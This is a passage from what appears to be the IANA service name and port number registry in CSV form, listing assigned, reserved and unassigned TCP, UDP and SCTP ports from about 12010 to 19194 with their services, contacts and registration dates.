,12010,udp,Reserved,,,,,,,, ,12011,,Unassigned,,,,,,,, vipera,12012,tcp,Vipera Messaging Service,[Silvano_Maffeis_2],[Silvano_Maffeis_2],2005-08,,,,, vipera,12012,udp,Vipera Messaging Service,[Silvano_Maffeis_2],[Silvano_Maffeis_2],2005-08,,,,, vipera-ssl,12013,tcp,Vipera Messaging Service over SSL Communication,[Silvano_Maffeis_2],[Silvano_Maffeis_2],2008-01-16,,,,, vipera-ssl,12013,udp,Vipera Messaging Service over SSL Communication,[Silvano_Maffeis_2],[Silvano_Maffeis_2],2008-01-16,,,,, ,12014-12108,,Unassigned,,,,,,,, rets-ssl,12109,tcp,RETS over SSL,[Bruce_Toback],[Bruce_Toback],2003-02,,,,, rets-ssl,12109,udp,RETS over SSL,[Bruce_Toback],[Bruce_Toback],2003-02,,,,, ,12110-12120,,Unassigned,,,,,,,, nupaper-ss,12121,tcp,NuPaper Session Service,[David_Warden_2],[David_Warden_2],2005-11,,,,, nupaper-ss,12121,udp,NuPaper Session Service,[David_Warden_2],[David_Warden_2],2005-11,,,,, ,12122-12167,,Unassigned,,,,,,,, cawas,12168,tcp,CA Web Access Service,[Jon_Press],[Jon_Press],2005-08,,,,, cawas,12168,udp,CA Web Access Service,[Jon_Press],[Jon_Press],2005-08,,,,, ,12169-12171,,Unassigned,,,,,,,, hivep,12172,tcp,HiveP,[Dick_Augustsson],[Dick_Augustsson],,,,,, hivep,12172,udp,HiveP,[Dick_Augustsson],[Dick_Augustsson],,,,,, ,12173-12299,,Unassigned,,,,,,,, linogridengine,12300,tcp,LinoGrid Engine,[Frans_Lundberg],[Frans_Lundberg],2004-11,,,,, linogridengine,12300,udp,LinoGrid Engine,[Frans_Lundberg],[Frans_Lundberg],2004-11,,,,, ,12301,,Unassigned,,,,,,,, rads,12302,tcp,"Remote Administration Daemon (RAD) is a system service that offers secure, remote, programmatic access to Solaris system configuration and run-time state",[Oracle],[Devjani_Ray],2012-04-20,,,,, ,12302,udp,Reserved,,,,,,,, ,12303-12320,,Unassigned,,,,,,,, warehouse-sss,12321,tcp,Warehouse Monitoring Syst SSS,[Craig_Steffen],[Craig_Steffen],2005-08,,,,, warehouse-sss,12321,udp,Warehouse Monitoring Syst SSS,[Craig_Steffen],[Craig_Steffen],2005-08,,,,, warehouse,12322,tcp,Warehouse Monitoring Syst,[Craig_Steffen],[Craig_Steffen],2005-08,,,,, warehouse,12322,udp,Warehouse Monitoring Syst,[Craig_Steffen],[Craig_Steffen],2005-08,,,,, ,12323-12344,,Unassigned,,,,,,,, italk,12345,tcp,Italk Chat System,[Takayuki_Ito],[Takayuki_Ito],,,,,, italk,12345,udp,Italk Chat System,[Takayuki_Ito],[Takayuki_Ito],,,,,, ,12346-12752,,Unassigned,,,,,,,, tsaf,12753,tcp,tsaf port,[Andreas_Fehr],[Andreas_Fehr],,,,,, tsaf,12753,udp,tsaf port,[Andreas_Fehr],[Andreas_Fehr],,,,,, ,12754-12864,,Unassigned,,,,,,,, netperf,12865,tcp,control port for the netperf benchmark,[netperf.org],[rick_jones],2013-04-05,,,,, ,12865,udp,Reserved,,,,,,,, ,12866-13159,,Unassigned,,,,,,,, i-zipqd,13160,tcp,I-ZIPQD,[Chuck_Runquist],[Chuck_Runquist],,,,,, i-zipqd,13160,udp,I-ZIPQD,[Chuck_Runquist],[Chuck_Runquist],,,,,, ,13161-13215,,Unassigned,,,,,,,, bcslogc,13216,tcp,Black Crow Software application logging,[Ramindur_Singh],[Ramindur_Singh],2008-12-04,,,,, bcslogc,13216,udp,Black Crow Software application logging,[Ramindur_Singh],[Ramindur_Singh],2008-12-04,,,,, rs-pias,13217,tcp,R&S Proxy Installation Assistant Service,[Guido_Kiener],[Guido_Kiener],2008-12-04,,,,, rs-pias,13217,udp,R&S Proxy Installation Assistant Service,[Guido_Kiener],[Guido_Kiener],2008-12-04,,,,, emc-vcas-tcp,13218,tcp,EMC Virtual CAS Service,,,,,,,, emc-vcas-udp,13218,udp,EMV Virtual CAS Service Discovery,[Mark_O_Connell],[Mark_O_Connell],2008-12-04,,,,, ,13219-13222,,Unassigned,,,,,,,, powwow-client,13223,tcp,PowWow Client,[Paul_K_Peterson],[Paul_K_Peterson],,,,,, powwow-client,13223,udp,PowWow Client,[Paul_K_Peterson],[Paul_K_Peterson],,,,,, powwow-server,13224,tcp,PowWow Server,[Paul_K_Peterson],[Paul_K_Peterson],,,,,, powwow-server,13224,udp,PowWow Server,[Paul_K_Peterson],[Paul_K_Peterson],,,,,, ,13225-13399,,Unassigned,,,,,,,, doip-data,13400,tcp,DoIP Data,[Joerg_Schneider],[Joerg_Schneider],2011-01-26,,,,, doip-disc,13400,udp,DoIP Discovery,[Joerg_Schneider],[Joerg_Schneider],2011-01-26,,,,, ,13401-13719,,Unassigned,,,,,,,, bprd,13720,tcp,BPRD Protocol (VERITAS NetBackup),[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, bprd,13720,udp,BPRD Protocol (VERITAS NetBackup),[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, bpdbm,13721,tcp,BPDBM Protocol (VERITAS NetBackup),[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, bpdbm,13721,udp,BPDBM Protocol (VERITAS NetBackup),[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, bpjava-msvc,13722,tcp,BP Java MSVC Protocol,[Tim_Schmidt],[Tim_Schmidt],,,,,, bpjava-msvc,13722,udp,BP Java MSVC Protocol,[Tim_Schmidt],[Tim_Schmidt],,,,,, ,13723,,Unassigned,,,,,,,, vnetd,13724,tcp,Veritas Network Utility,[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, vnetd,13724,udp,Veritas Network Utility,[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, ,13725-13781,,Unassigned,,,,,,,, bpcd,13782,tcp,VERITAS NetBackup,[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, bpcd,13782,udp,VERITAS NetBackup,[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, vopied,13783,tcp,VOPIED Protocol,[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, vopied,13783,udp,VOPIED Protocol,[Jeff_Holmbeck],[Jeff_Holmbeck],,,,,, ,13784,,Unassigned,,,,,,,, nbdb,13785,tcp,NetBackup Database,[Pat_Tovo],[Pat_Tovo],2004-12,,,,, nbdb,13785,udp,NetBackup Database,[Pat_Tovo],[Pat_Tovo],2004-12,,,,, nomdb,13786,tcp,Veritas-nomdb,[Clayton_Haapala],[Clayton_Haapala],2005-08,,,,, nomdb,13786,udp,Veritas-nomdb,[Clayton_Haapala],[Clayton_Haapala],2005-08,,,,, ,13787-13817,,Unassigned,,,,,,,, dsmcc-config,13818,tcp,DSMCC Config,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, dsmcc-config,13818,udp,DSMCC Config,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, dsmcc-session,13819,tcp,DSMCC Session Messages,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, dsmcc-session,13819,udp,DSMCC Session Messages,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, dsmcc-passthru,13820,tcp,DSMCC Pass-Thru Messages,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, dsmcc-passthru,13820,udp,DSMCC Pass-Thru Messages,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, dsmcc-download,13821,tcp,DSMCC Download Protocol,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, dsmcc-download,13821,udp,DSMCC Download Protocol,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, dsmcc-ccp,13822,tcp,DSMCC Channel Change Protocol,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, dsmcc-ccp,13822,udp,DSMCC Channel Change Protocol,[Tim_Addington],[Tim_Addington],,,[ISO/IEC 13818-6 MPEG-2 DSM-CC],,, bmdss,13823,tcp,Blackmagic Design Streaming Server,[Sam_Vaughan],[Sam_Vaughan],2011-03-01,,,,, ,13823,udp,Reserved,,,,,,,, ,13824-13893,,Unassigned,,,,,,,, ucontrol,13894,tcp,Ultimate Control communication protocol,[NEGU_Soft],[borja_lopez_urkidi],2012-09-10,,,,, ucontrol,13894,udp,Ultimate Control communication protocol,[NEGU_Soft],[borja_lopez_urkidi],2012-09-10,,,,, ,13895-13928,,Unassigned,,,,,,,, dta-systems,13929,tcp,D-TA SYSTEMS,[Alexis_Bose],[Alexis_Bose],2008-12-08,,,,, dta-systems,13929,udp,D-TA SYSTEMS,[Alexis_Bose],[Alexis_Bose],2008-12-08,,,,, medevolve,13930,tcp,MedEvolve Port Requester,[Jon_Robertson],[Jon_Robertson],2008-10-24,,,,, ,13930,udp,Reserved,,,,,,,, ,13931-13999,,Unassigned,,,,,,,, scotty-ft,14000,tcp,SCOTTY High-Speed Filetransfer,[Patrick_Verbeek],[Patrick_Verbeek],2007-05,,,,, scotty-ft,14000,udp,SCOTTY High-Speed Filetransfer,[Patrick_Verbeek],[Patrick_Verbeek],2007-05,,,,, sua,14001,tcp,SUA,[Miguel_Angel_Garcia],[Miguel_Angel_Garcia],,,,,, sua,14001,udp,De-Registered,[Miguel_Angel_Garcia],[Miguel_Angel_Garcia],2001-06-06,,,,, sua,14001,sctp,SUA,[Miguel_Angel_Garcia],[Miguel_Angel_Garcia],,,,,, scotty-disc,14002,udp,Discovery of a SCOTTY hardware codec board,[SCOTTY_Group_SE],[Patrick_Verbeek_2],2013-01-14,,,,, ,14002,tcp,Reserved,,,,,,,, ,14003-14032,,Unassigned,,,,,,,, sage-best-com1,14033,tcp,sage Best! Config Server 1,[Christian_Rubach],[Christian_Rubach],,,,,, sage-best-com1,14033,udp,sage Best! Config Server 1,[Christian_Rubach],[Christian_Rubach],,,,,, sage-best-com2,14034,tcp,sage Best! Config Server 2,[Christian_Rubach],[Christian_Rubach],,,,,, sage-best-com2,14034,udp,sage Best! Config Server 2,[Christian_Rubach],[Christian_Rubach],,,,,, ,14035-14140,,Unassigned,,,,,,,, vcs-app,14141,tcp,VCS Application,[Ming_Xu],[Ming_Xu],,,,,, vcs-app,14141,udp,VCS Application,[Ming_Xu],[Ming_Xu],,,,,, icpp,14142,tcp,IceWall Cert Protocol,[Tsutomu_Fujinami],[Tsutomu_Fujinami],2005-08,,,,, icpp,14142,udp,IceWall Cert Protocol,[Tsutomu_Fujinami],[Tsutomu_Fujinami],2005-08,,,,, ,14143-14144,,Unassigned,,,,,,,, gcm-app,14145,tcp,GCM Application,[Ming_Xu],[Ming_Xu],,,,,, gcm-app,14145,udp,GCM Application,[Ming_Xu],[Ming_Xu],,,,,, ,14146-14148,,Unassigned,,,,,,,, vrts-tdd,14149,tcp,Veritas Traffic Director,[Sameer_Deokule],[Sameer_Deokule],2002-03,,,,, vrts-tdd,14149,udp,Veritas Traffic Director,[Sameer_Deokule],[Sameer_Deokule],2002-03,,,,, vcscmd,14150,tcp,Veritas Cluster Server Command Server,[Anand_Bhalerao],[Anand_Bhalerao],2008-10-02,,,,, ,14150,udp,Reserved,,,,,,,, ,14151-14153,,Unassigned,,,,,,,, vad,14154,tcp,Veritas Application Director,[Rajeev_Verma],[Rajeev_Verma],2006-02,,,,, vad,14154,udp,Veritas Application Director,[Rajeev_Verma],[Rajeev_Verma],2006-02,,,,, ,14155-14249,,Unassigned,,,,,,,, cps,14250,tcp,Fencing Server,[Mayank_Vasa],[Mayank_Vasa],2008-04-03,,,,, cps,14250,udp,Fencing Server,[Mayank_Vasa],[Mayank_Vasa],2008-04-03,,,,, ,14251-14413,,Unassigned,,,,,,,, ca-web-update,14414,tcp,CA eTrust Web Update Service,[Robert_Ciochon],[Robert_Ciochon],2006-08,,,,, ca-web-update,14414,udp,CA eTrust Web Update Service,[Robert_Ciochon],[Robert_Ciochon],2006-08,,,,, ,14415-14935,,Unassigned,,,,,,,, hde-lcesrvr-1,14936,tcp,hde-lcesrvr-1,[Horizon_Digital_Ente],[Horizon_Digital_Ente],,,,,, hde-lcesrvr-1,14936,udp,hde-lcesrvr-1,[Horizon_Digital_Ente],[Horizon_Digital_Ente],,,,,, hde-lcesrvr-2,14937,tcp,hde-lcesrvr-2,[Horizon_Digital_Ente],[Horizon_Digital_Ente],,,,,, hde-lcesrvr-2,14937,udp,hde-lcesrvr-2,[Horizon_Digital_Ente],[Horizon_Digital_Ente],,,,,, ,14938-14999,,Unassigned,,,,,,,, hydap,15000,tcp,Hypack Data Aquisition,[HYPACK_Inc],[Mircea_Neacsu],,2011-10-27,,,, hydap,15000,udp,Hypack Data Aquisition,[HYPACK_Inc],[Mircea_Neacsu],,2011-10-27,,,, ,15001,,Unassigned,,,,,,,, onep-tls,15002,tcp,Open Network Environment TLS,[Cisco_3],[Andrew_Thurber],2014-01-21,,,,, ,15002,udp,Reserved,,,,,,,, ,15003-15117,,Unassigned,,,,,,,, ,15118,tcp,Reserved,,,,,,,, v2g-secc,15118,udp,v2g Supply Equipment Communication Controller Discovery Protocol,[Holger_Lochner],[Holger_Lochner],2011-04-06,,,,, ,15119-15344,,Unassigned,,,,,,,, xpilot,15345,tcp,XPilot Contact Port,[Bert_Gijsbers],[Bert_Gijsbers],,,,,, xpilot,15345,udp,XPilot Contact Port,[Bert_Gijsbers],[Bert_Gijsbers],,,,,, ,15346-15362,,Unassigned,,,,,,,, 3link,15363,tcp,3Link Negotiation,[Brant_Thomsen],[Brant_Thomsen],2003-01,,,,, 3link,15363,udp,3Link Negotiation,[Brant_Thomsen],[Brant_Thomsen],2003-01,,,,, ,15364-15554,,Unassigned,,,,,,,, cisco-snat,15555,tcp,Cisco Stateful NAT,[Kaushik_Biswas],[Kaushik_Biswas],2006-03,,,,, cisco-snat,15555,udp,Cisco Stateful NAT,[Kaushik_Biswas],[Kaushik_Biswas],2006-03,,,,, ,15556-15659,,Unassigned,,,,,,,, bex-xr,15660,tcp,Backup Express Restore Server,[Chi_Shih_Chang],[Chi_Shih_Chang],2008-03-19,,,,, bex-xr,15660,udp,Backup Express Restore Server,[Chi_Shih_Chang],[Chi_Shih_Chang],2008-03-19,,,,, ,15661-15739,,Unassigned,,,,,,,, ptp,15740,tcp,Picture Transfer Protocol,[Petronel_Bigioi],[Petronel_Bigioi],2004-11,,,,,Defined TXT keys: guid= ptp,15740,udp,Picture Transfer Protocol,[Petronel_Bigioi],[Petronel_Bigioi],2004-11,,,,,Defined TXT keys: guid= ,15741-15997,,Unassigned,,,,,,,, ,15998,tcp,Reserved,,,,,,,, 2ping,15998,udp,2ping Bi-Directional Ping Service,[Ryan_Finnie],[Ryan_Finnie],2010-10-06,,,,, programmar,15999,tcp,ProGrammar Enterprise,[Norman_Wilson],[Norman_Wilson],2010-10-06,,,,, ,15999,udp,Reserved,,,,,,,, fmsas,16000,tcp,Administration Server Access,[Mark_Davidson],[Mark_Davidson],2010-10-06,,,,Known Unauthorized Use on port 16000, ,16000,udp,Reserved,,,,,,,Known Unauthorized Use on port 16000, fmsascon,16001,tcp,Administration Server Connector,[Mark_Davidson],[Mark_Davidson],2010-10-06,,,,, ,16001,udp,Reserved,,,,,,,, gsms,16002,tcp,GoodSync Mediation Service,[Vadim_Maslov],[Vadim_Maslov],2010-10-06,,,,, ,16002,udp,Reserved,,,,,,,, ,16003,tcp,Reserved,,,,,,,, alfin,16003,udp,Automation and Control by REGULACE.ORG,[Ing_Tomas_Halabala],[Ing_Tomas_Halabala],2010-10-06,,,,, ,16004-16019,,Unassigned,,,,,,,, jwpc,16020,tcp,Filemaker Java Web Publishing Core,[Robert_Parks],[Robert_Parks],2010-05-12,,,,, ,16020,udp,Reserved,,,,,,,, jwpc-bin,16021,tcp,Filemaker Java Web Publishing Core Binary,[Robert_Parks],[Robert_Parks],2010-05-12,,,,, ,16021,udp,Reserved,,,,,,,, ,16022-16160,,Unassigned,,,,,,,, sun-sea-port,16161,tcp,Solaris SEA Port,[Dana_Porter],[Dana_Porter],2003-10,,,,, sun-sea-port,16161,udp,Solaris SEA Port,[Dana_Porter],[Dana_Porter],2003-10,,,,, solaris-audit,16162,tcp,Solaris Audit - secure remote audit log,[Jan_Friedel],[Jan_Friedel],2009-05-07,,,,, ,16162,udp,Reserved,,,,,,,, ,16163-16308,,Unassigned,,,,,,,, etb4j,16309,tcp,etb4j,[Christopher_R_Smith],[Christopher_R_Smith],2004-11,,,,, etb4j,16309,udp,etb4j,[Christopher_R_Smith],[Christopher_R_Smith],2004-11,,,,, pduncs,16310,tcp,"Policy Distribute, Update Notification",[Diane_I_Shannon],[Diane_I_Shannon],2006-08,,,,, pduncs,16310,udp,"Policy Distribute, Update Notification",[Diane_I_Shannon],[Diane_I_Shannon],2006-08,,,,, pdefmns,16311,tcp,Policy definition and update management,[Diane_I_Shannon],[Diane_I_Shannon],2007-04,,,,, pdefmns,16311,udp,Policy definition and update management,[Diane_I_Shannon],[Diane_I_Shannon],2007-04,,,,, ,16312-16359,,Unassigned,,,,,,,, netserialext1,16360,tcp,Network Serial Extension Ports One,[Michael_J_Hoy],[Michael_J_Hoy],,,,,, netserialext1,16360,udp,Network Serial Extension Ports One,[Michael_J_Hoy],[Michael_J_Hoy],,,,,, netserialext2,16361,tcp,Network Serial Extension Ports Two,[Michael_J_Hoy],[Michael_J_Hoy],,,,,, netserialext2,16361,udp,Network Serial Extension Ports Two,[Michael_J_Hoy],[Michael_J_Hoy],,,,,, ,16362-16366,,Unassigned,,,,,,,, netserialext3,16367,tcp,Network Serial Extension Ports Three,[Michael_J_Hoy],[Michael_J_Hoy],,,,,, netserialext3,16367,udp,Network Serial Extension Ports Three,[Michael_J_Hoy],[Michael_J_Hoy],,,,,, netserialext4,16368,tcp,Network Serial Extension Ports Four,[Michael_J_Hoy],[Michael_J_Hoy],,,,,, netserialext4,16368,udp,Network Serial Extension Ports Four,[Michael_J_Hoy],[Michael_J_Hoy],,,,,, ,16369-16383,,Unassigned,,,,,,,, connected,16384,tcp,Connected Corp,[Nicole_C_Ouellette],[Nicole_C_Ouellette],2004-02,,,,, connected,16384,udp,Connected Corp,[Nicole_C_Ouellette],[Nicole_C_Ouellette],2004-02,,,,, ,16385-16618,,Unassigned,,,,,,,, xoms,16619,tcp,X509 Objects Management Service,[Francis_GASCHET],[Francis_GASCHET],2008-09-08,,,,, ,16619,udp,Reserved,,,,,,,, ,16620-16665,,Unassigned,,,,,,,, ,16666,tcp,Reserved,,,,,,,, vtp,16666,udp,Vidder Tunnel Protocol,[Vidder_Inc],[Ted_Schroeder_2],2011-10-24,,,,, ,16667-16899,,Unassigned,,,,,,,, newbay-snc-mc,16900,tcp,Newbay Mobile Client Update Service,[Srinivasa_Nayudu],[Srinivasa_Nayudu],2009-07-06,,,,, newbay-snc-mc,16900,udp,Newbay Mobile Client Update Service,[Srinivasa_Nayudu],[Srinivasa_Nayudu],2009-07-06,,,,, ,16901-16949,,Unassigned,,,,,,,, sgcip,16950,tcp,Simple Generic Client Interface Protocol,[John_Aquilino],[John_Aquilino],,,,,, sgcip,16950,udp,Simple Generic Client Interface Protocol,[John_Aquilino],[John_Aquilino],,,,,, ,16951-16990,,Unassigned,,,,,,,, intel-rci-mp,16991,tcp,INTEL-RCI-MP,[Jane_Dashevsky],[Jane_Dashevsky],,,,,, intel-rci-mp,16991,udp,INTEL-RCI-MP,[Jane_Dashevsky],[Jane_Dashevsky],,,,,, amt-soap-http,16992,tcp,Intel(R) AMT SOAP/HTTP,[David_T_Hines],[David_T_Hines],2005-02,,,,, amt-soap-http,16992,udp,Intel(R) AMT SOAP/HTTP,[David_T_Hines],[David_T_Hines],2005-02,,,,, amt-soap-https,16993,tcp,Intel(R) AMT SOAP/HTTPS,[David_T_Hines],[David_T_Hines],2005-02,,,,, amt-soap-https,16993,udp,Intel(R) AMT SOAP/HTTPS,[David_T_Hines],[David_T_Hines],2005-02,,,,, amt-redir-tcp,16994,tcp,Intel(R) AMT Redirection/TCP,[Nimrod_Diamant],[Nimrod_Diamant],2005-02,,,,, amt-redir-tcp,16994,udp,Intel(R) AMT Redirection/TCP,[Nimrod_Diamant],[Nimrod_Diamant],2005-02,,,,, amt-redir-tls,16995,tcp,Intel(R) AMT Redirection/TLS,[Nimrod_Diamant],[Nimrod_Diamant],2005-02,,,,, amt-redir-tls,16995,udp,Intel(R) AMT Redirection/TLS,[Nimrod_Diamant],[Nimrod_Diamant],2005-02,,,,, ,16996-17006,,Unassigned,,,,,,,, isode-dua,17007,tcp,,,,,,,,, isode-dua,17007,udp,,,,,,,,, ,17008-17183,,Unassigned,,,,,,,, vestasdlp,17184,tcp,Vestas Data Layer Protocol,[Vestas_Wind_Systems],[Teunis_de_Wit],2013-10-30,,,,, ,17184,udp,Reserved,,,,,,,, soundsvirtual,17185,tcp,Sounds Virtual,[Richard_Snider],[Richard_Snider],,,,,, soundsvirtual,17185,udp,Sounds Virtual,[Richard_Snider],[Richard_Snider],,,,,, ,17186-17218,,Unassigned,,,,,,,, chipper,17219,tcp,Chipper,[Ronald_Jimmink],[Ronald_Jimmink],,,,,, chipper,17219,udp,Chipper,[Ronald_Jimmink],[Ronald_Jimmink],,,,,, avtp,17220,tcp,IEEE 1722 Transport Protocol for Time Sensitive Applications,[Transport_Protocol_for_Time-Sensitive_Networking_TG],[Ashley_Butterworth],2014-03-07,,,,, avtp,17220,udp,IEEE 1722 Transport Protocol for Time Sensitive Applications,[Transport_Protocol_for_Time-Sensitive_Networking_TG],[Ashley_Butterworth],2014-03-07,,,,, avdecc,17221,tcp,"IEEE 1722.1 AVB Discovery, Enumeration, Connection management, and Control",[IEEE_1722_1],[Jeffrey_Daniel_Koftinoff],2011-11-01,,,,, avdecc,17221,udp,"IEEE 1722.1 AVB Discovery, Enumeration, Connection management, and Control",[IEEE_1722_1],[Jeffrey_Daniel_Koftinoff],2011-11-01,,,,, ,17222,tcp,Reserved,,,,,,,, cpsp,17222,udp,Control Plane Synchronization Protocol (SPSP),[Randall_Stewart_2],[Randall_Stewart_2],2011-11-10,,,,, ,17223-17233,,Unassigned,,,,,,,, integrius-stp,17234,tcp,Integrius Secure Tunnel Protocol,[Christian_Klemetsson],[Christian_Klemetsson],2010-03-04,,,,, integrius-stp,17234,udp,Integrius Secure Tunnel Protocol,[Christian_Klemetsson],[Christian_Klemetsson],2010-03-04,,,,, ssh-mgmt,17235,tcp,SSH Tectia Manager,[Ville_Laurikari],[Ville_Laurikari],2005-08,,,,, ssh-mgmt,17235,udp,SSH Tectia Manager,[Ville_Laurikari],[Ville_Laurikari],2005-08,,,,, ,17236-17499,,Unassigned,,,,,,,, db-lsp,17500,tcp,Dropbox LanSync Protocol,[Paul_Bohm],[Paul_Bohm],2010-01-21,,,,, db-lsp-disc,17500,udp,Dropbox LanSync Discovery,[Paul_Bohm],[Paul_Bohm],2010-01-21,,,,, ,17501-17554,,Unassigned,,,,,,,, ailith,17555,tcp,Ailith management of routers,[Thomas_Boje],[Thomas_Boje],2014-03-27,,,,, ,17555,udp,Reserved,,,,,,,, ,17556-17728,,Unassigned,,,,,,,, ea,17729,tcp,Eclipse Aviation,[William_Schmidt],[William_Schmidt],2006-03,,,,, ea,17729,udp,Eclipse Aviation,[William_Schmidt],[William_Schmidt],2006-03,,,,, ,17730-17753,,Unassigned,,,,,,,, zep,17754,tcp,Encap. ZigBee Packets,[Fred_Fierling],[Fred_Fierling],2006-02,,,,, zep,17754,udp,Encap. ZigBee Packets,[Fred_Fierling],[Fred_Fierling],2006-02,,,,, zigbee-ip,17755,tcp,ZigBee IP Transport Service,[Chris_Herzog],[Chris_Herzog],2006-05,,,,, zigbee-ip,17755,udp,ZigBee IP Transport Service,[Chris_Herzog],[Chris_Herzog],2006-05,,,,, zigbee-ips,17756,tcp,ZigBee IP Transport Secure Service,[Chris_Herzog],[Chris_Herzog],2006-05,,,,, zigbee-ips,17756,udp,ZigBee IP Transport Secure Service,[Chris_Herzog],[Chris_Herzog],2006-05,,,,, ,17757-17776,,Unassigned,,,,,,,, sw-orion,17777,tcp,SolarWinds Orion,[Joel_Dolisy],[Joel_Dolisy],2008-09-10,,,,, ,17777,udp,Reserved,,,,,,,, ,17778-17999,,Unassigned,,,,,,,, biimenu,18000,tcp,"Beckman Instruments, Inc.",[R_L_Meyering],[R_L_Meyering],,,,,, biimenu,18000,udp,"Beckman Instruments, Inc.",[R_L_Meyering],[R_L_Meyering],,,,,, ,18001-18103,,Unassigned,,,,,,,, radpdf,18104,tcp,RAD PDF Service,[Christopher_Truxaw],[Christopher_Truxaw],2010-10-15,,,,, ,18104,udp,Reserved,,,,,,,, ,18105-18135,,Unassigned,,,,,,,, racf,18136,tcp,z/OS Resource Access Control Facility,[Bruce_Wells],[Bruce_Wells],2010-10-04,,,,, ,18136,udp,Reserved,,,,,,,, ,18137-18180,,Unassigned,,,,,,,, opsec-cvp,18181,tcp,OPSEC CVP,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-cvp,18181,udp,OPSEC CVP,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-ufp,18182,tcp,OPSEC UFP,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-ufp,18182,udp,OPSEC UFP,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-sam,18183,tcp,OPSEC SAM,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-sam,18183,udp,OPSEC SAM,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-lea,18184,tcp,OPSEC LEA,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-lea,18184,udp,OPSEC LEA,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-omi,18185,tcp,OPSEC OMI,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-omi,18185,udp,OPSEC OMI,[Alon_Kantor],[Alon_Kantor],,,,,, ohsc,18186,tcp,Occupational Health SC,[David_Fudge],[David_Fudge],2003-08,,,,, ohsc,18186,udp,Occupational Health Sc,[David_Fudge],[David_Fudge],2003-08,,,,, opsec-ela,18187,tcp,OPSEC ELA,[Alon_Kantor],[Alon_Kantor],,,,,, opsec-ela,18187,udp,OPSEC ELA,[Alon_Kantor],[Alon_Kantor],,,,,, ,18188-18240,,Unassigned,,,,,,,, checkpoint-rtm,18241,tcp,Check Point RTM,[Dudi_Hazan],[Dudi_Hazan],,,,,, checkpoint-rtm,18241,udp,Check Point RTM,[Dudi_Hazan],[Dudi_Hazan],,,,,, iclid,18242,tcp,Checkpoint router monitoring,[Check_Point_Software],[Rahul_Bahadur],2012-06-28,,,,, ,18242,udp,Reserved,,,,,,,, clusterxl,18243,tcp,Checkpoint router state backup,[Check_Point_Software],[Rahul_Bahadur],2012-06-28,,,,, ,18243,udp,Reserved,,,,,,,, ,18244-18261,,Unassigned,,,,,,,, gv-pf,18262,tcp,GV NetConfig Service,[Scott_Libert],[Scott_Libert],2008-01-29,,,,, gv-pf,18262,udp,GV NetConfig Service,[Scott_Libert],[Scott_Libert],2008-01-29,,,,, ,18263-18462,,Unassigned,,,,,,,, ac-cluster,18463,tcp,AC Cluster,[Lisa_Zhong],[Lisa_Zhong],,,,,, ac-cluster,18463,udp,AC Cluster,[Lisa_Zhong],[Lisa_Zhong],,,,,, ,18464-18633,,Unassigned,,,,,,,, rds-ib,18634,tcp,Reliable Datagram Service,[Andy_Grover],[Andy_Grover],2009-02-27,,,,, rds-ib,18634,udp,Reliable Datagram Service,[Andy_Grover],[Andy_Grover],2009-02-27,,,,, rds-ip,18635,tcp,Reliable Datagram Service over IP,[Andy_Grover],[Andy_Grover],2009-05-20,,,,, rds-ip,18635,udp,Reliable Datagram Service over IP,[Andy_Grover],[Andy_Grover],2009-05-20,,,,, ,18636-18768,,Unassigned,,,,,,,, ique,18769,tcp,IQue Protocol,[Avi_Drissman],[Avi_Drissman],2002-07,,,,, ique,18769,udp,IQue Protocol,[Avi_Drissman],[Avi_Drissman],2002-07,,,,, ,18770-18880,,Unassigned,,,,,,,, infotos,18881,tcp,Infotos,[Marcel_Dube],[Marcel_Dube],2004-11,,,,, infotos,18881,udp,Infotos,[Marcel_Dube],[Marcel_Dube],2004-11,,,,, ,18882-18887,,Unassigned,,,,,,,, apc-necmp,18888,tcp,APCNECMP,[Michael_Yip],[Michael_Yip],,,,,, apc-necmp,18888,udp,APCNECMP,[Michael_Yip],[Michael_Yip],,,,,, ,18889-18999,,Unassigned,,,,,,,, igrid,19000,tcp,iGrid Server,[Massimo_Cafaro],[Massimo_Cafaro],2004-11,,,,, igrid,19000,udp,iGrid Server,[Massimo_Cafaro],[Massimo_Cafaro],2004-11,,,,, ,19001-19006,,Unassigned,,,,,,,, scintilla,19007,tcp,Scintilla protocol for device services,[Veejansh_Inc],[Chirag_Patel],2014-03-04,,,,, scintilla,19007,udp,Scintilla protocol for device services,[Veejansh_Inc],[Chirag_Patel],2014-03-04,,,,, ,19008-19019,,Unassigned,,,,,,,, j-link,19020,tcp,J-Link TCP/IP Protocol,[SEGGER],[SEGGER],,,,,, ,19020,udp,Reserved,,,,,,,, ,19021-19190,,Unassigned,,,,,,,, opsec-uaa,19191,tcp,OPSEC UAA,[Reuven_Harrison],[Reuven_Harrison],,,,,, opsec-uaa,19191,udp,OPSEC UAA,[Reuven_Harrison],[Reuven_Harrison],,,,,, ,19192-19193,,Unassigned,,,,,,,, ua-secureagent,19194,tcp,UserAuthority SecureAgent,[Reuven_Harrison_2],[Reuven_Harrison_2],2003-01,,,,, 